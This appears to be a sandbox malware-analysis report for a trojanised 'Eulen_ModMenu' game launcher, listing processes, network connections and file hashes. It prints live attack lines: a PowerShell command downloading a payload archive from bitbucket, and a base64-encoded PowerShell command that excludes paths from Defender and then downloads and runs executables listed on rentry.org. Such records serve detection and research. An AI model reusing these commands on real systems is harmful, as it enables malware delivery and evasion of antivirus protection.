C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/43g34g34g34/34g34g34g34g/raw/6dd364f2430bc8a2e90cb810c94663de171617ac/pan.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe
"C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAB6AHkAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbABiAHcAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaAByAGQAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAHAAYQBuAGMAZQBrADYAMQAxADEAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbAB0AHcAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAGgAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAHkAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcQBuAHUAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABpAGYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AZwB2ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB4AG4AbAAjAD4A"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\41yjujbz.1rp0.exe
"C:\Users\Admin\AppData\Roaming\41yjujbz.1rp0.exe"
C:\Users\Admin\AppData\Roaming\41yjujbz.1rp1.exe
"C:\Users\Admin\AppData\Roaming\41yjujbz.1rp1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1831.tmp\1832.tmp\1833.bat C:\Users\Admin\AppData\Roaming\41yjujbz.1rp0.exe"
C:\Windows\system32\chcp.com
chcp 1251
C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5820 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "tf_win64.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "dota2.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "cs2.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "RustClient.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "GTA5.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "TslGame.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "steam.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im steam.exe
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=5664 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\tar.exe
tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "tf_win64.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "dota2.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "cs2.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "RustClient.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "GTA5.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "TslGame.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\find.exe
find /i "steam.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /im steam.exe
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\tar.exe
tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=896 --field-trial-handle=2276,i,8141563759201846273,4796430289054839473,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| GB | 51.140.244.186:443 | nav-edge.smartscreen.microsoft.com | tcp |
| GB | 51.140.244.186:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 2.17.251.21:443 | bzib.nelreports.net | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| BE | 2.21.17.194:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | dl-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | dl-edge.smartscreen.microsoft.com | udp |
| GB | 51.140.242.104:443 | dl-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 21.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.17.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.242.140.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| GB | 142.250.187.234:443 | tcp | |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.189.173.22:443 | nw-umwatson.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 22.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | update.googleapis.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | business.bing.com | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| FR | 172.217.20.195:443 | update.googleapis.com | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 13.107.246.64:443 | edge-mobile-static.azureedge.net | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 13.107.6.158:443 | business.bing.com | tcp |
| US | 13.107.246.64:443 | edge-mobile-static.azureedge.net | tcp |
| IE | 94.245.104.56:443 | api.edgeoffer.microsoft.com | tcp |
| US | 8.8.8.8:53 | 195.20.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| US | 8.8.8.8:53 | nav-edge.smartscreen.microsoft.com | udp |
| GB | 51.11.108.188:443 | nav-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | bzib.nelreports.net | udp |
| US | 8.8.8.8:53 | 188.108.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.104.245.94.in-addr.arpa | udp |
| US | 2.17.251.4:443 | bzib.nelreports.net | tcp |
| US | 2.17.251.4:443 | bzib.nelreports.net | tcp |
| US | 8.8.8.8:53 | 4.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | rentry.org | udp |
| FR | 164.132.58.105:443 | rentry.org | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 105.58.132.164.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| FR | 164.132.58.105:443 | rentry.org | tcp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | cd181299f06462062d3048df0982c762 |
| SHA1 | 98aa7b13747ea9d117c44afe2da339d3da37ab6a |
| SHA256 | dfc43fc93bc23099fd9ba281277406489887fd55fdfe1f16af1e8625c3c6e773 |
| SHA512 | f9bbd51e0c011dd6a97f31275323c4e5d8a764f7f0121b0c48af4fbd50204e6c383e83628089d270ecac1e5a118b2ce9b10f7970042f5843a3fd14d525cdd48c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c55b6d0d0267bb7b4dde087de1d4144f |
| SHA1 | 4ea3e27b654c42cbb32ce0d88bafb366c2943a73 |
| SHA256 | 3d329d25276d1fee413325fe195949ab1557aba733cfe17a4b93f425f65d0884 |
| SHA512 | d5cc9255caf81886aa34d923984f30e72712b9d4697414a3ac2398018318eecbb42de7244d17ccc0b5abfe477e2b5e56cd3aab504ec145f13ebe0e091277095a |
\??\pipe\crashpad_2872_KXXRSKNYDJZEYRLI
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | ebe22f02d9419e9738e239a9ff6eb5c6 |
| SHA1 | cdb430a633fa2098f18d53611ae76f5872d03f38 |
| SHA256 | 5080c261d386462a546280a4969d925219b269a93564187506a568ff6d96034a |
| SHA512 | fb869f5e0abc3f51a9c07b22bc78ee332e5c2eb9c22bb78940fb797424182c9825b79d480ef49a00fbb49f1544f83baf8e799246a1c61a5822e1552b3abe9804 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4e0af78b01d75eeb2e91b597f345e717 |
| SHA1 | 4dec333a150e7b2925cb6a7f6e4ea203266c03a9 |
| SHA256 | 373af8c41131102962d671d7f349530f265f08c027dc1867d2f1eadfa1b25b6a |
| SHA512 | a973770e21f751736b03988c09f0f5d3eb329ca67bc7f305bba28f076b845608dc1659bda58105ca682d1efb10578120429c99db24a8121957283c15bfc36686 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
| MD5 | 03105bcd7d57bc5c69110d712e7450b2 |
| SHA1 | 3ffa5b9fd2988f1d3d4cd5bcf281c4b06084a17c |
| SHA256 | b9cda8bbc84190b737a9be29a96d716be8c883a3aac141980390749a530d9c74 |
| SHA512 | b492ad3c95ea965ffe94fb8703c29b834c68167ae4f6d6bb48ca7cfab627c0dbfe01af254be06d7e205c125c51c60a3a54b8c42e3d93355c3eee7441d1b57c81 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | f28133ec3c60b012f691d02aec407aa5 |
| SHA1 | 6dac63c88f419d998e15c1749e1f8165924defb1 |
| SHA256 | 8aa1919aa1af875d81df4171b04e91164aa32c6c051f2e782ea23efca6775375 |
| SHA512 | 7bae08c312a3a44f3d0c0191b2e1ba48baa24a6fd84fabb569910a7e531e3e897bd33829e726338116f1178b56f15c9fba108f1a05575cba413658ecf10c021c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8ea3efec3010e6353c282248462d0c6b |
| SHA1 | a553f760aff366f2df033462eed1576cdbb804f9 |
| SHA256 | 56a2b95e3ec95a3447e8e39c4f87821b3ecfa696b06abfa07b963281fe15dc43 |
| SHA512 | 2f2691dd1f1d4cb09817f936c58692c1253eb797189b6fcd8de0f0fd2206eaa74f3996df50f3d59801fda8388ce4dcbbf86e256c6ce9414e825e582ba9c3c900 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 262358de7954c5b3a19e35facc10bac9 |
| SHA1 | a726a9f928effe28a574a840b873d8fe789fbd94 |
| SHA256 | 93df8e0aac2fe67029ed68c887d47fd564069bc627bfe7366dc22b730803c9eb |
| SHA512 | c1f426eadb0295b9011a9adceebeebd4cfeaac2e17813e9a7c5256b71e243bf4a0418bca8ba5ff21c89438356ffd55b68eaa6d6eb01e251eb6e1c20254932137 |
C:\Users\Admin\Downloads\Eulen_ModMenu.7z
| MD5 | ee21ce584fc7d5c58a64f00a0c6ed18e |
| SHA1 | 26c6e2f5760fb620727f597031bdfe1cf63af696 |
| SHA256 | c434dad4e50e4e0f60fc648574010335c4dff0c59d5876b3e138d8d82b91ac5f |
| SHA512 | e9c9cdbed4939452f194a5f6d1c857743df55f4a9774f9e969d24f447c868bdc2dad442ce2c86f05e1f0160b5f069efa3bad3341d24a6898368f319f5aa289ff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\TransportSecurity
| MD5 | b4cd65d07fc392a15b9b98ddc4ec0b72 |
| SHA1 | 5006fee0faf2603d362a9bdce7841378fba2a488 |
| SHA256 | 522afc6cbfd39cbbfab55953b15018c097f9f41050555f876ab689798c886541 |
| SHA512 | bec3c4cc794b7990f5537042076d812c78985ced099d93fc03185833fb66ffcd418d7c426955b1b9bfef3ef0b698ac638c87631e2606feffe338e0869a8a96ea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7a3e2131cd72a71eae772a9223d1bdc2 |
| SHA1 | eb7d6f704561c56cb7a7d7e3f516957b32d2ce5f |
| SHA256 | 23a1c64a98b2f70e314ccab594250b487661249d0248c4547c8ae0affe36f790 |
| SHA512 | 333799c288452545b9c89ad92c9e6c1c47bdf306ffa2e802d7859e65a33cf061ad7dba3a67d243c303ca4aecf58adcadfd9f71693a06db0ec6efa5e88b59f423 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 9a7fb95a1b702f25939f273a05753f03 |
| SHA1 | 5104c63438cd57956ac4c3fabc2ffee75d8d0431 |
| SHA256 | 8fe1580f59b05eb36d715ef9b28f8998601980f177e461a2916bacbea730dbbe |
| SHA512 | 764fdc17879e0f4c2023b7bce29345492a9f5839a76138a8949680785be4f67458bdd6e011041e4af20a4ddadb8af503ea917d727173a4865234b6da5bff817d |
C:\Users\Admin\Desktop\Eulen_ModMenu\Launcher.exe
| MD5 | eee2a79d3170f463e9697ddb8b97d41e |
| SHA1 | 818c82b1743c91f423c92742b54355b2058ff417 |
| SHA256 | a4569f2cabda528425ec397aef16d6f8fc15ca94664f6f98d738d0b3dc570b41 |
| SHA512 | 139b6366a088d9aaa055fae4c7853c872fe4a31dfb7dc8e3961f144db0d712342fd4e9ef6f20e5f3cbb225a4f23c3ed24e55d144f9342398e8305f54a327d5ea |
memory/1672-168-0x00000000001F0000-0x00000000001F8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gt34ucde.kga.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4912-179-0x000001D074EB0000-0x000001D074ED2000-memory.dmp
C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc0.exe
| MD5 | df6fde77146a91b25c4ec0c86ae45ef0 |
| SHA1 | 9d52a7f79337e41907b64918f7ea08f4ba5784ac |
| SHA256 | 8d6f0c1d1e4878975b953c806014cd734d5b6a5986636355ab9f86b502dd9a86 |
| SHA512 | 2edd6872d216d0dde2aea8d02b0e47fa3b354eddbfce7983fb7e411cc6b89df83c7228e2065df3673037848386cbe461a3200b4fa60278fc9f7fca1aa378d407 |
C:\Users\Admin\AppData\Roaming\q5ydrqg4.edc1.exe
| MD5 | 01a72f1659cfe71d56340773f3c89bf9 |
| SHA1 | b87d0a06df5896b9129efd823ea237905cfa9d1e |
| SHA256 | 7205faf5054589ce7dc6b68dcfea45c18859cb49a3c0d4bda840fc9d308152bd |
| SHA512 | 59e1de953a7bbb7f87da2de9c9575ba7c0098b31afc549c1eff2256ee9beddc590aec88d32716f386fd3a7037d610365d72bbded94278cd0d341ce337579d1e8 |
memory/4920-202-0x0000000000B10000-0x0000000000B7D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\FA78.tmp\FA79.tmp\FA7A.bat
| MD5 | 7b532a3f19c30058cbdad529901de7c1 |
| SHA1 | d9f4882fce5d9ab3ddc3e8143ea25ff47caf44e6 |
| SHA256 | 64a37a81bfbe37708a8e5d80329dcf5b7c08d5eaed672ceff3075a6bbb8db644 |
| SHA512 | 5d56a01c31cf8fb665a8df7b5708dc3b43c5c8df1464e3787a072e06eed5dc9c6708a44c78801182fb3e5d40239d899b9864598b5bfb960dad02ef6150482c78 |
memory/4920-208-0x0000000003930000-0x0000000003D30000-memory.dmp
memory/4920-209-0x0000000003930000-0x0000000003D30000-memory.dmp
memory/4920-210-0x00007FF9A6730000-0x00007FF9A6925000-memory.dmp
memory/4920-212-0x0000000077700000-0x0000000077915000-memory.dmp
memory/3944-213-0x00000000007A0000-0x00000000007A9000-memory.dmp
memory/4920-214-0x0000000000B10000-0x0000000000B7D000-memory.dmp
memory/3944-216-0x00000000024F0000-0x00000000028F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
memory/3944-218-0x00007FF9A6730000-0x00007FF9A6925000-memory.dmp
memory/3944-220-0x0000000077700000-0x0000000077915000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c321ce5c529b0b756ad69a719371d600 |
| SHA1 | abf615e98069e732169cb9b56d8b7b58067bd4ec |
| SHA256 | 9ac27c4257a90651a2ff2b6fdf448c47a1893bc5c44b6c06c3715c56ff36a0f6 |
| SHA512 | 8a465b2ab7d61aa3ecfdb8f4fec1e4241230f1c71172c202bb5742a340195346dbe30d6e868dda3e3bb66fd658e6cfb17a44e6780ee9463d7b880f8d00ec8bf6 |
memory/5072-274-0x0000000000E50000-0x0000000000EBD000-memory.dmp
C:\Users\Admin\AppData\Roaming\runHidden.vbs
| MD5 | e549f4a267c5ce0d4661c41cec783fdf |
| SHA1 | 1fd5921d991b21ed21f6a62b80d252eadc1c7ebd |
